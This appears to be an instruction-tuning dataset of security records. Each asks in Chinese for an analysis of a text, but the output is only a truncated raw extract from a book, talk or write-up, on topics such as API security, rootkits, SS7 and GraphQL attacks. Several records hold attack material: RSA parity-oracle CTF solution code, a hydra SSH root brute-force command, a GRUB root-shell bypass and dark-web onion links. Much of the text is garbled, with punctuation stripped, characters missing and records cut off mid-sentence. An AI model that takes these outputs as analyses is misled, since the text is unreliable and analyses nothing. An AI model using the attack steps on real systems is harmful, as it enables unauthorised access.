{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n随着API技术的发展和广泛使用API安全问题越来越受到人们的 重视本书从API安全的视角出发介绍了API技术的发展和变化以及 不同API技术中常见的安全漏洞探讨了如何使用自动化安全工具检测 API安全漏洞如何使用API安全设计规避漏洞全书从API安全漏洞基 础知识入手逐步讲解API安全设计API安全治理等内容并结合头 部互联网企业的API安全案例分析业界API安全的最佳实践是国内 第一本讲解API安全知识和技术实战的专业书籍 本书适合网络安全人员软件开发人员系统架构师以及高等院校 相关专业师生阅读学习 图书在版编目CIP数据 API安全技术与实战/钱君生杨明韦巍编著.北京机械工业出版 社2021.5 网络空间安全技术丛书 ISBN 978-7-111-67639-3 Ⅰ.①A Ⅱ.①钱②杨③韦 Ⅲ.①计算机网络-网络安全 Ⅳ.①TP393.08 中国版本图书馆CIP数据核字2021第036173号 机械工业出版社北京市百万庄大街22号 邮政编码 1300037 策划编辑李培培 责任编辑李培培 责任校对张艳霞 责任印制李 昂 北京机工印刷厂印刷 2021年3月第1版第1次印刷 184mm260mm15.5印张379千字 标准书号ISBN 978-7-111-67639-3 定价99.00元 电话服务 客服电话010-88361066 010-88379833 010-68326294 网络服务 机 工 官 网www.cmpbook.com 机 工 官 博weibo.com/cmp1952 金 书 网www.golden-book.com 机工教育服务网www.cmpedu.com 封底无防伪标均为盗版 网络空间安全技术丛书专家委员会名单 主 任 沈昌祥 中国工程院院士 副 主 任 方滨兴 中国工程院院士 王小云 中国科学院院士 委 员以姓氏拼音为序 陈兴蜀 四川大学 陈 洋 小米科技有限责任公司 程 光 东南大学 程 琳 中国人民公安大学 丁 勇 广西密码学与信息安全重点实验室 弓峰敏 滴滴出行科技有限公司 贺卫东 中电长城网际系统应用有限公司 贾 焰 中国人民解放军国防科技大学 李 晖 西安电子科技大学 李建华 上海交通大学 李 进 广州大学 李欲晓 中国网络空间研究院 刘建伟 北京航空航天大学 马 斌 腾讯计算机系统有限公司 马 杰 北京百度网讯科技有限公司 孟 丹 中国科学院信息工程研究所 卿 昱 中国电子科技网络信息安全公司 任 奎 浙江大学 谈剑峰 上海众人网络安全技术有限公司 谭晓生 北京赛博英杰科技有限公司 位 华 中国信息安全测评中心 魏 军 中国网络安全审查技术与认证中心 吴志刚 中国软件评测中心 肖新光 安天实验室 谢海永 中国科学技术大学 赵 波 武汉大学 郑志彬 华为技术有限公司 祝跃飞 中国人民解放军战略支援部队信息工程大学 秘 书 长 胡毓坚 机械工业出版社 副秘书长 秦 安 中国网络空间战略研究所 出版说明 随着信息技术的快速发展网络空间逐渐成为人类生活中一个不可 或缺的新场域并深入到了社会生活的方方面面由此带来的网络空间 安全问题也越来越受到重视网络空间安全不仅关系到个体信息和资产 安全更关系到国家安全和社会稳定一旦网络系统出现安全问题那 么将会造成难以估量的损失从辩证角度来看安全和发展是一体之两 翼驱动之双轮安全是发展的前提发展是安全的保障安全和发展 要同步推进没有网络空间安全就没有国家安全 为了维护我国网络空间的主权和利益加快网络空间安全生态建 设促进网络空间安全技术发展机械工业出版社邀请中国科学院中 国工程院中国网络空间研究院浙江大学上海交通大学华为及腾 讯等全国网络空间安全领域具有雄厚技术力量的科研院所高等院校 企事业单位的相关专家成立了阵容强大的专家委员会共同策划了这 套网络空间安全技术丛书以下简称\"丛书\" 本套丛书力求做到规划清晰定位准确内容精良技术驱动全 面覆盖网络空间安全体系涉及的关键技术包括网络空间安全网络安 全系统安全应用安全业务安全和密码学等以技术应用讲解为 主理论知识讲解为辅做到\"理实\"结合 与此同时我们将持续关注网络空间安全前沿技术和最新成果不 断更新和拓展丛书选题力争使该丛书能够及时反映网络空间安全领域 的新方向新发展新技术和新应用以提升我国网络空间的防护能 力助力我国实现网络强国的总体目标 由于网络空间安全技术日新月异而且涉及的领域非常广泛本套 丛书在选题遴选及优化和书稿创作及编审过程中难免存在疏漏和不足 诚恳希望各位读者提出宝贵意见以利于丛书的不断精进 机械工业出版社 前言 对大多数IT技术人员来说API这个词并不陌生而对架构师研 发工程师安全工程师来说API则更是日常工作中接触并熟知的内 容从2008年国内API经济活跃伊始各个互联网企业纷纷构建自己的 API开放", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 威胁狩猎相关资源 ## 合集项目 - 威胁狩猎大合集 - https://blue.y1ng.org/0x2_threat_hunting - The ThreatHunting Project - https://github.com/ThreatHuntingProject/ThreatHunting - https://www.threathunting.net/ - The ThreatHunter-Playbook - https://github.com/OTRF/ThreatHunter-Playbook ## 相关工具 ### 暗网搜索工具 - 暗网搜索引擎dark searchhttps://darksearch.io/ - 暗网搜索引擎ahmiahttps://ahmia.fi/ - 暗网搜索工具iaca-darkweb-toolshttps://iaca-darkweb-tools.com/search-darkweb/ - 洋葱搜索引擎https://onionsearchengine.com/ - 洋葱站点搜索https://onionlandsearchengine.com/ - 暗网链接网页deepwebsiteslinkshttps://www.deepwebsiteslinks.com/ - 暗网社交媒体https://iaca-darkweb-tools.com/socialmedia/ - 暗网字典https://iaca-darkweb-tools.com/dictionary/ - 暗网调查工具TorBothttps://github.com/DedSecInside/TorBot - 暗网地图https://www.hyperiongray.com/ ### 暗网咨询信息 - 暗网每日简报https://www.hunch.ly/darkweb-osint/ - 暗网市场/新闻https://dnstats.net/ - TOR博客https://blog.torproject.org/tor-heart-onionshare - 暗网市场/论坛marketplaceshttps://iaca-darkweb-tools.com/marketplaces/ ### 暗网导航页 - [666] 暗网导航 - 表网https://onion666.com/ - [666] 暗网导航http://666666666tjjjeweu5iikuj7hkpke5phvdylcless7g4dn6vma2xxcad.onion/ ### TG频道搜索 - Telegram Search Enginehttps://xtea.io/", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCableTap Wirelessly Tapping your Home Network Marc Newlin Bastille Networks marc@bastille.io @marcnewlin Logan Lamb Bastille Networks logan@bastille.io Christopher Grayson Web Sight chris@websight.io @_lavalamp Welcome to the LineCon after-party. Marc Newlin (@marcnewlin) Wireless Security Researcher @ Bastille Networks Christopher Grayson (@_lavalamp)  Web development  Academic researcher  Haxin all the things  Founder & Principal Engineer (Web Sight) Logan Lamb (Researcher @ Bastille Networks) What is CableTap?  26 CVEs  ISP-provided wireless gateways and set-top boxes  Multiple unauthenticated RCE attack chains  Network vulnerabilities  Wi-Fi vulnerabilities  ZigBee RF4CE vulnerabilities Why does CableTap matter?  Full compromise of affected devices  Wide impact  ISP vulnerabilities  Vendor vulnerabilities  RDK vulnerabilities (software stack used by many major ISPs)  Attack chains affecting Comcast XFINITY devices have been patched Agenda 1. Background on RDK 2. RDK-based devices 3. Progression of research 4. Vulnerabilities 5. Disclosure process 6. Q&A Background on RDK Reference Development Kit (RDK)  a standardized software stack with localization plugins created to accelerate the deployment of next-gen video products and services by multichannel video providers (MVPDs).  Founded in 2012  Standardized software stack for modems, set top boxes, media devices https://rdkcentral.com/ Yay Open Source (?) Software! An open-source, community-driven project available at: https://code.rdkcentral.com/ But wait whats this WHOIS record? Ohhhh that sinking feeling in the pit of my stomach Yeah But Who Needs Patches Anyhoo  Theres the open source version, then theres the versions deployed on deployed devices  Lots of vulns patched in the open source repo  Patches take months to deploy, no CVEs filed for, no disclosure to affected customers  Still faster to deploy patches with RDK than non-standardized native stacks  RCE, XSS, XSRF, you name it they got it RDK-Based Devices", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDemystifying Modern Windows Rootkits Bill Demirkapi Independent Security Researcher 1 Demystifying Modern Windows Rootkits  Black Hat USA 2020 Who Am I?  18 years old  Sophomore at the Rochester Institute of Technology  Windows Internals  Mostly self-taught (with guidance)  Strong Game Hacking background 2 Demystifying Modern Windows Rootkits  Black Hat USA 2020 What Is This Talk About? In this talk, well go over  Loading a rootkit.  Communicating with a rootkit.  Abusing legitimate network communications.  An example rootkit I wrote and the design choices behind it.  Executing commands from kernel.  Tricks to cover up the filesystem trace of your rootkit. Demystifying Modern Windows Rootkits  Black Hat USA 2020 3 Introduction to Windows Rootkits Demystifying Modern Windows Rootkits  Black Hat USA 2020 4 Windows Rootkits: An Overview Why would you want to use a rootkit?  Kernel drivers have significant access to the machine.  Same privilege level as a typical kernel anti-virus.  Less mitigations and security solutions targeting kernel malware.  Anti-Virus often have less visibility into operations performed by kernel drivers.  Kernel drivers are often ignored by anti-virus. Demystifying Modern Windows Rootkits  Black Hat USA 2020 5 Example: Treatment by Anti-Virus Anti-virus tends to treat kernel drivers with significant trust compared to user-mode applications. Demystifying Modern Windows Rootkits  Black Hat USA 2020 6 Excerpt from Carbon Blacks Process/Thread Handle callbacks Excerpt from Malwarebytes Process/Thread Handle callbacks Loading a Rootkit Demystifying Modern Windows Rootkits  Black Hat USA 2020 7 Abuse Legitimate Drivers There are a lot of vulnerable drivers. With some reversing knowledge, finding a 0-day in a driver can be trivial. Examples include  Capcoms Anti-Cheat driver  Intels NAL Driver  Microsoft themselves! Demystifying Modern Windows Rootkits  Black Hat USA 2020 8 Abuse Legitimate Drivers Using legitimate drivers has quite a few benefits too", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# RSA 复杂题目 ## 2018 Tokyo Western Mixed Cipher 题目给的信息如下所示 - 每次交互可以维持的时间长度约为 5 分钟 - 每次交互中中n是确定的 1024 bit但是未知 e 为 65537 - 使用 aes 加密了 flag密钥和 IV 均不知道 - 每次密钥是固定的但是 IV 每次都会随机 - 可以使用 encrypt 功能随意使用 rsa 和 aes 进行加密其中每次加密都会对 aes 的 iv 进行随机 - 可以使用 decrypt 对随意的密文进行解密但是只能知道最后一个字节是什么 - 可以使用 print_flag 获取 flag 密文 - 可以使用 print_key 获取 rsa 加密的 aes 密钥 本题目看似一个题目实则是 3 个题目需要分步骤解决在此之前我們準備好交互的函數 ```python def get_enc_key(io): io.read_until(\"4: get encrypted keyn\") io.writeline(\"4\") io.read_until(\"here is encrypted key :)n\") c=int(io.readline()[:-1],16) return c def encrypt_io(io,p): io.read_until(\"4: get encrypted keyn\") io.writeline(\"1\") io.read_until(\"input plain text: \") io.writeline(p) io.read_until(\"RSA: \") rsa_c=int(io.readline()[:-1],16) io.read_until(\"AES: \") aes_c=io.readline()[:-1].decode(\"hex\") return rsa_c,aes_c def decrypt_io(io,c): io.read_until(\"4: get encrypted keyn\") io.writeline(\"2\") io.read_until(\"input hexencoded cipher text: \") io.writeline(long_to_bytes(c).encode(\"hex\")) io.read_until(\"RSA: \") return io.read_line()[:-1].decode(\"hex\") ``` ### GCD attack n 第一步我们需要把没有给出的 n 算出来因为我们可以利用 encrypt 功能对我们输入的明文 x 进行 rsa 加密那么可以利用整除的性质算 n ```python 因为x  e = c mod n 所以 n | x  e - c ``` 我们可以构造足够多的 x算出最够多的 x  e - c从而计算最大公约数得到 n ``` def get_n(io): rsa_c,aes_c=encrypt_io(io,long_to_bytes(2)) n=pow(2,65537)-rsa_c for i in range(3,6): rsa_c, aes_c = encrypt_io(io, long_to_bytes(i)) n=primefac.gcd(n,pow(i,65537)-rsa_c) return n ``` 可以利用加密进行 check ```python def check_n(io,n): rsa_c, aes_c = encrypt_io(io, \"123\") if pow(bytes_to_long(\"123\"), e, n)==rsa_c: return True else: return False ``` ### RSA parity oracle 利用 leak 的的最后一个字节我们可以进行选择密文攻击使用 RSA parity oracle 回复 aes 的秘钥 ```python def guess_m(io,n,c): k=1 lb=0 ub=n while ub!=lb: print lb,ub tmp = c * gmpy2.powmod(2, k*e, n) % n if ord(decrypt_io(io,tmp)[-1])%2==1: lb = (lb + ub) / 2 else: ub = (lb + ub) / 2 k+=1 print ub,len(long_to_bytes(ub)) return ub ``` ### PRNG Predict 这里我们可以解密 flag 的16字节之后的内容了但是前16个字节没有 IV 是解密不了的这时我们可以发现IV 生成使用的随机数使用了 g", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n关于Xdebug3的一些记录 因为周末升级了下phpstorm发现最新版的phpstorm支持的是xdebug3所以记录了一下调试 xdebug3的一些东西 环境 windows phpstorm 2020.3 xdebug3 配置 1. 去xdebug官网下载对应的版本https://xdebug.org/download并把dll文件复制到php的ext文 件夹下 2. 接着在php.ini下添加以下配置 这里就是一个踩坑点以上是xdebug3的配置语法因为xdebug3和xdebug2配置的语法有改进并且 默认端口从9000变成了9003网上大多都是xdebug2的配置 如果按xdebug2的配置的话会报错 其他xdebug的语法更新配置可以查看更新文档https://xdebug.org/docs/upgrade_guide [Xdebug] xdebug.idekey = PHPSTORM zend_extension = \"E:\\phpstudy_pro\\Extensions\\php\\php7.3.4nts\\ext\\php_xdebug- 3.0.1-7.3-vc15-nts-x86_64.dll\" xdebug.remote_handler = \"dbgp\" xdebug.mode = debug xdebug.client_host = localhost xdebug.client_port = 9003 [Xdebug] xdebug.idekey = PHPSTORM zend_extension = \"E:\\phpstudy_pro\\Extensions\\php\\php7.3.4nts\\ext\\php_xdebug- 3.0.1-7.3-vc15-nts-x86_64.dll\" xdebug.remote_enable = on xdebug.remote_host = localhost xdebug.remote_post = 9000 Xdebug: [Config] The setting 'xdebug.remote_enable' has been renamed, see the upgrading guide at https://xdebug.org/docs/upgrade_guide Xdebug: [Config] The setting 'xdebug.remote_host' has been renamed, see the upgrading guide at https://xdebug.org/docs/upgrade_guide Xdebug: [Config] The setting 'xdebug.remote_mode' has been renamed, see the upgrading guide at https://xdebug.org/docs/upgrade_guide Xdebug: [Config] The setting 'xdebug.remote_port' has been renamed, see the upgrading guide at https://xdebug.org/docs/upgrade_guide 3. phpstorm中的配置 配置php 配置debug可以看到监听端口更新为了9003 配置Servers 配置configurations 4. 需要安装的浏览器插件我用的chrome Xdebug helper JetBrains IDE Support 到这里就算配置完了不过我当时遇到些问题启动的时候又报错了 Cannot accept external Xdebug connection $_SERVER[\"SERVER_NAME\"] is empty, it may be caused by web server misconfiguration. Nginx: add fastcgi parameter to nginx configuration, more Apache: configure ServerName for current VirtualHost, more 这里又是一个踩坑点找了好久网上都没有具体的解决方案都是说回滚版本到phpstorm2020.1且不 用xdebug3 后来终于找到个解决方法https://recordit.co/J1PMoHobSR 添加一个系统变量PHP_IDE_CONFIG变量值为 serverName=上面配置servers中的name 成功", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nUser Privacy for ISPs and Accidental ISPs For latest version, please see http://www.eff.org/ User Privacy for ISPs and Accidental ISPs. The Digital Millennium Copyright Act gives people who claim to own copyrights tremendous power to invade the privacy of Internet users. With only a clerks stamp on a form, almost anyone can demand that an Internet service provider reveal its users personal information  if the ISP has that information. If youre served with a subpoena, as the RIAA showed Verizon in court, you dont get to choose whether or not to respond. This means your data is at the mercy of not just record companies seeking out music swappers, but also private detectives, spammers, and cranks of all kinds who might demand users names and addresses.1 Whether youre a big ISP or dorm-room sysadmin, you can preserve your users privacy best by not keeping any logs containing that information or connecting them to online activity in the first place  you cant be made to disclose information you dont have. If you are not in business as an ISP, but are providing network connectivity  for example, offering wired or wireless access to library patrons, visitors at a café, or friends and neighbors in a residence  you may still be the target of one of these information demands. But as a non-commercial ISP, youve probably got no good reason to keep this info in the first place. In fact, you may want to become an accidental ISP in order to provide some additional privacy for people downstream from your router. Changing the way that you keep records and connect your users in simple ways can help you limit the legal hassles youll face as a non-commercial ISP. Computers are uniquely identified on their networks by IP address.2 To protect privacy, network administrators can opt to assign pools of IP addresses dynamically, rotating a fixed number of addresses randomly among a group of users, then delete assignment logs promptly to protect the privacy of users. EFF is not aware of any l", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHacking the Smart Grid Tony Flick FYRM Associates tony.flick@fyrmassociates.com Abstract The city of Miami and several commercial partners plan to rollout a smart grid citywide electrical infrastructure by the year 2011. This rollout was announced on the heels of news that foreign agents have infiltrated our existing electrical infrastructure and that recent penetration tests have uncovered numerous vulnerabilities in the proposed technologies. Simultaneously, the National Institute for Standards in Technology (NIST) has recently released a roadmap for producing smart grid standards. In this whitepaper, I will discuss the flaws with the current guidelines and map them to the criticisms of similar regulatory mandates, including the Payment Card Industry Data Security Standard (PCI DSS), that rely heavily on organizations policing themselves. What is the Smart Grid? The smart grid provides electricity from suppliers to consumers using digital technology. The proposed technology will allow suppliers to remotely monitor consumer usage as well as implement variable rates that increase and decrease during peak energy use times. Additionally, consumers will be able to monitor their energy use in real time, which could allow them to save money by conserving energy during peak energy use times. The major goals of the smart grid initiative are to increase efficiency, reliability, and safety of the countrys electrical infrastructure. Security Initiatives Every security-related document regarding the smart grid discusses and requires security to be integrated into the smart grid from the very beginning. This is a significant improvement over previous technology initiatives and shows that organizations and elected officials are beginning to understand at some level how to manage security in projects. The Energy Independence and Security Act of 2007 provided the Department of Energy with the responsibility of developing the smart grid program. The Department of Energy then assign", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWAVESTONE 1 Ayoub ELAASSAL ayoub.elaassal@wavestone.com @ayoul3__ Dealing the perfect hand Shuffling memory blocks on z/OS  WAVESTONE 2 What people think of when I talk about mainframes  WAVESTONE 3 The reality: IBM zEC 13 technical specs:  10 TB of RAM  141 processors,5 GHz  Dedicated processors for JAVA, XML and UNIX  Cryptographic chips Badass Badass Badass !! So whatwho uses those anymore ?  WAVESTONE https://mainframesproject.tumblr.com 6  WAVESTONE 7 About me Pentester at Wavestone, mainly hacking Windows and Unix stuff First got my hands on a mainframe in 2014Hooked ever since When not hacking stuff: Metal and wine  github.com/ayoul3  ayoul3__  WAVESTONE 8 This talk Why we should care about mainframes Quick recap on how to execute code on z/OS Playing with z/OS memory layout  WAVESTONE 9 Quick recap on how to execute code on z/OS Sniffing credentials Good ol bruteforce Go through the middleware And many more (FTP, NJE, etc.) Check out Phil & Chads talks !  WAVESTONE 10 The wonders of TN3270 The main protocole to interact with a Mainframe is called TN3270 TN3270 is simply a rebranded Telnet Clear text by default X3270 emulator if you dont have the real thing  WAVESTONE 11 The wonders of TN3270  WAVESTONE 12 Damn EBCDIC  WAVESTONE 13 Ettercap dissector by @Mainframed767 [DEMO ETTERCAP]  WAVESTONE 14 Quick recap on how to execute code on z/OS Sniffing credentials Good ol bruteforce Go through the middleware And many more (FTP, NJE, etc.) Check out Phil & Chads talks !  WAVESTONE 15 Time Sharing Option (TSO) Tsk tsk tsk too friendly! TSO is the /bin/bash on z/OS  WAVESTONE 16 Bruteforce Nmap script by @Mainframed767  WAVESTONE 17 Bruteforce is still surprisingly effective Passwords derived from login Windows : 5% Mainframe : 27%  WAVESTONE 18 Quick recap on how to execute code on z/OS Sniffing credentials Good ol bruteforce Go through the middleware And many more (FTP, NJE, etc.) Check out Phil & Chads talks !  WAVESTONE 19  WAVESTONE 20  WAVESTONE 21  WAVESTONE ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nProtecting Against and Investigating Insider Threats A methodical, multi-pronged approach to protecting your organization Antonio A. Rucci Program Director Technical Intelligence and Security Programs Global Initiatives Directorate Oak Ridge National Laboratory Oak Ridge, TN 37831 AGENDA A methodical, multi-pronged approach to protecting your organization  Key indicators of an insider threat and how to detect them  Specific hiring practices to minimize your risk  Security awareness training and education to thwart opportunistic individuals  Recent case studies that illustrate the key indicators and how to protect against them www.ornl.gov AGENDA A methodical, multi-pronged approach to protecting your organization  Key indicators of an insider threat and how to detect them  Specific hiring practices to minimize your risk  Security awareness training and education to thwart opportunistic individuals  Recent case studies that illustrate the key indicators and how to protect against them Who Are The Insiders?  Employees  Former Employees  Contractors  Consultants  Suppliers  Visitors  Collaborators  User facilities  University faculty  Industry Pre-conditions  Motive or need to be satisfied through the crime  Ability to Overcome Inhibitions:  Moral values  Fear of being caught  Loyalty to employer or co-workers  Risk-Taking Behaviors  Trigger that sets the betrayal in motion  Opportunity to commit the crime  Poor and/or lax security practices Motive  Financial  Anger  Excitement  Divided loyalties  Arrogance  The BIG 3: - Greed - Disgruntlement - Revenge  Moral Values  Ethical Values  Loyalty  Fear  Rationalization Ability to Overcome Inhibitions Trigger  Personal or professional event  Stress pushes individual to the breaking point  React negatively, and criminally  Emotionally stable/well adjusted  React to stress in a positive manner At least 1/4 of American spies experienced a personal life crisis in the months preceding an espionage attempt. 1. Proving that the Ven", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n攻击GraphQL phith0n 什么是 GraphQL ? { REST } 进化 GraphQL 一个为API通信设计的查询语言 描述你的数据 type Project { name: String tagline: String contributors: [User] } 请求你要的数据 { project(name: \"GraphQL\") { tagline } } 获得可预测的结果 { \"project\": { \"tagline\": \"A query language for APIs\" } } type Project { name: String tagline: String contributors: [User] } { project(name: \"GraphQL\") { tagline } } { \"project\": { \"tagline\": \"A query language for APIs\" } } ObjectType Field Arguments Query or Mutation  ObjectType: 类似于高级语言中的类定义了一个完整的结构  Field: 字段类似于高级语言中的属性  Arguments: 作为参数传入Query或Mutation  Query or Mutation: 特殊的Type分别代表查询和更改语句省略则表示Query GraphQL SQL 后端  数据库 前端  后端 SELECT * FROM table ... query OperatorName { ... UPDATE table SET ... mutation OperatorName { ... 一门用于关系型数据库的查询语言 一门用于与API通信的查询语言 管理工具NavicatPHPMyAdmin... 管理工具GraphiQL GraphQL是一门自带文档的技术 利用内省即可列出列出 GraphQL中所有QueryMutationObjectTypeFieldArguments Risk 1. 敏感信息泄露与越权 POST /graphql HTTP/1.1 Host: graphqlapp.herokuapp.com Content-Type: application/json {\"query\": \"\\n query IntrospectionQuery {\\n __schema {\\n queryType { name }\\n mutationType { name }\\n ...\"} HTTP/1.1 200 OK Content-Type: application/json { \"data\": { \"__schema\": { \"queryType\": { \"name\": \"Query\" ... 自动生成文档  https://github.com/2fd/graphdoc Github APIv4 文档 Risk 1. 敏感信息泄露与越权 在objects.types中寻找敏感信息  email  password  secretKey  token  licenseKey  session 多多关注废弃的字段deprecated fields Risk 1. 敏感信息泄露与越权 绕过Query权限控制  直接请求敏感信息  从关联数据集ForeignKey中获取敏感信息 绕过Mutation权限控制  根据ArgumentsInputObjectType自动化Fuzz所有Mutation 思考  和挖掘传统RESTful API敏感信息泄露漏洞有何区 别 Risk 1. 敏感信息泄露与越权 Hackerone为API设计的权限控制层  THE $30,000 GEM: PART 1 对象属性均有权限控制不同用户组看到的结果不同 没有权限控制的内容  对象数量 从未控制权限的内容入手  The request tells the number of private programs, the new system of authorization /invite/token  Team object in GraphQL disclosed total number of whitelisted hackers 案例hackerone 一系列信息泄露漏洞 案例hackerone 一系列信息泄露漏洞 { team(handle: \"security\") { id name handle whitelisted_hackers { edges { cursor } total_count } } } { \"data\": { \"team\": { \"id\": \"Z2lkOi8v", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRadio Exploitation 101 Characterizing, Contextualizing, and Applying Wireless Attack Methods Matt Knight Bastille Networks San Francisco, CA matt@bastille.net Marc Newlin Bastille Networks Atlanta, GA marc@bastille.net AbstractReverse engineering wireless physical layers has never been easier, thanks to the commoditization of Software Defined Radio (SDR) technology and an active open source community. However, the successful application of SDR to security challenges requires extensive domain knowledge and insight into radio frequency fundamentals. The goal of this paper, and accompanying presentation, is to highlight how wireless network exploitation is both similar to, and distinct from wired, network exploitation, and to offer techniques that will aid security researchers in thinking creatively about wireless reverse engineering and exploit development. Index Termswireless, security, reverse engineering, software defined radio, radio frequency, internet of things, mobile I. INTRODUCTION The growth of mobile and Internet of Things (IoT) technologies has reshaped the computing landscape as we know it. Devices are made to be smart (smart[phones  cars  refridgerators  etc.]) by upgrading them with embedded computers. By bolting on processing and network connectivity, they are exposed to other devices on networks, which can be as small as comprising only two devices or as broad as the open Internet. This introduces an expansive new attack surface to a hypothetical security model. II. THE EVOLUTION OF NETWORK EXPLOITATION Recent years have seen a flood of novel wireless exploits, with exploitation moving beyond 802.11 and into more ob- scure standard and proprietary wireless protocols. This can be attributed to the proliferation and commoditization of technologies that provide promiscuous access to the physical layer of the communication stack. For context, we will briefly discuss the evolution of network exploitation. A. Network Abstraction Models Network abstraction model", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAttacks you cant combat: Vulnerabilities of most robust mobile operators Sergey Puzankov About me Telecom 7+ years in telecom security 18+ years in telecom industry Security Knowledge sharing Research results & community contribution @xigins sergey_puzankov spuzankov@ptsecurity.com SS7 basics SS7 (Signaling System No. 7) is a set of telephony protocols used to set up and tear down telephone calls, send and receive SMS messages, provide subscriber mobility, and more. Ø Fixed telephony Ø 2G/3G mobile networks Ø Interconnection with next- generation networks Who are potential targets?  GSMA Intelligence 2018, Mobile connections by technology https://www.gsmaintelligence.com/research/2018/02/infographic-mobile-connections-by-technology/656/ 5 Now what can a Hacker do? Easily From anywhere Any mobile operator No special skills needed Get access to your email and social media Track location of VIPs and public figures Perform massive denial of service attacks Intercept private data, calls and SMS messages Steal money Take control of your digital identity History of signaling security SS7 development Trusted environment. No security mechanisms in the protocol stack. SIGTRAN (SS7 over IP) introduced. Security is still missing. Scope grows Growing number of SS7 connections, increasing amount of SS7 traffic. No security policies or restrictions. Not trusted anymore Huge number of MNOs, MVNOs, and VAS providers. SS7 widely used, Diameter added and spreading. Still not enough security. Mobile operators and SS7 security Security assessment Signaling IDS SMS Home Routing Security configuration SS7 firewall Basic nodes and identifiers HLR  Home Location Register MSC/VLR  Mobile Switching Center and Visited Location Register SMS-C  SMS Centre MSISDN  Mobile Subscriber Integrated Services Digital Number IMSI  International Mobile Subscriber Identity STP  Signaling Transfer Point GT  Global Title, address of a core node element SS7 protocol stack SCCP TCAP MAP Signaling Connection Con", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 从次实战聊聊获取源代码的姿势 Liquid Files LxLL 般思路 LxLN 试 LxLO 柳暗花明 LxLP 单户模式 LxLQ 后台鸡肋命令执低权限 EXP 进c神的圈也挺久还没有发过帖于是借最近的个案例来聊聊实战中获取源码的些姿势 也是前段时间某次闭分享的素材 hope you guys enjoy it~ Liquid Files是国外的款盘官https://www.liquidfiles.com/ Liquid Files 2 是收费的套系统外得多 咱们今天就来试试获取这套系统的源代码并进前期的攻击评估初步的代码审计 正如我在章记次Java Servlet实战审计 - 先知社区中说的那样获取系统的源代码主要可以从 个度来考虑 1. 同类站扫录 a. 上Fofa搜索同类系统 b. 导出资产列表 c. 录扫描具体操作起来就是使 dirbuster 的字典 directory-list-2.3- medium.txt 来扫具就随便个顺的 dirseach ps它的字典 dicc.txt 也好  结论因为本身这玩意的发布形式都是镜像统部署的当然不会有备份件了果 2. 盘泄露这套系统并不开源般国内的家发版的时候为图便都会放了些在盘简单 搜就知道有结果 结论家家本身有官没必要传盘麻烦果 3. Githubgitlab泄露搜了下您看看这像源码么 0x00 般思路 3 结论果 也不绕弯了但凡看过官就知道这公司很耿直直接提供了试...... 这也正是本主要想介绍的技巧利家的安装镜像获取源代码 那么我们直接注册试登录注册进到下载界... 0x01 试 4 舒舒服服的随便下哪个都安上跑起来 填写 License Key 5 安装信息填好部署在内直接开冲 在系统玩耍番后发现System下有个功能叫Console喜点进去看nmd试 License法使Console 6 可家并不希望试户拿到root权限......此时获取源码像是陷了僵局 不过且让我们来整理整理上的信息 1. 端只开了80443222连ssh端都没开..... 2. 不对默认不放开ssh的话那系统旦出问题了连也连不上岂不是直接烂在不合适 吧因此感觉不怎么可能关闭ssh 3. 仔细看噢原来这个222就是ssh的端 4. 好的现在知道ssh开放了但是root密码呢翻了翻档没找到 5. 于是爆破 top10k  rockyou.txt 给爷猛冲 0x02 柳暗花明 Ruby 复制代码 Ruby 复制代码 Ruby 复制代码 80/tcp open http 222/tcp open rsh-spx 443/tcp open https 1 2 3 PORT STATE SERVICE VERSION 222/tcp open ssh OpenSSH 7.4 (protocol 2.0) MAC Address: 00:0C:29:4C:C9:82 (VMware) 1 2 3 hydra -t 4 -l root -P rockyou-15.txt -s 222 ssh://10.10.111.6 1 7 全部出错不让我爆破 不让爆破那咋办这镜像安在我的电脑上就是我的了爆破下居然还要被拒之外 7. 突然想到这套系统安装在VM中相当于我可以物理接触它再联想下Windows不是开 机的时候可以通过进安全模式来恢复密码吗Linux应该也有这种模式吧 于是有了这第三节 下的内容参考http://c.biancheng.net/view/1041.html 0x03 单户模式  很多新当对忘记 root 账户密码导致法登陆系统这个问题时直接选择重新系统其实 可不必我只需要进 emergency mode单户模式更新 root 账户的密码即可 8 如何进单户模式 现在我们假设系统出现了问题已经不能正常登录了那么如何进单户模式呢先需要重启 服务器在 GRUB 读秒界按任意键进 GRUB 菜单界如图所示 在想要进单户模式的 Linux 菜单上按\"e\"键就会进 GRUB 编辑界如下图所示 找到 linux /boot/vmlinuz-* 那江湖上传闻有两种常的操作式 1. 我常在最后添加 init=/bin/bash 然后按 ctrl+x 或者 F10 继续grub引导此后的 户即为root户可以在其中随意更改root户的账号密码 2. 没试过将它的ro recovery nomodestset及之后的东替换为 rw single init=/bin/bash 然后按 ctrl+x或者F10 进单户模式  Linux 的单户模式有些类似 Windows 的安全模式只启动最少的程序于系统修复在单户 模式运级别为 1中Linux 引导进根 Shell络被禁只有少数进程运 9 总之虽然单户模式下没", "category": "text_analysis", "source": "security_papers"}
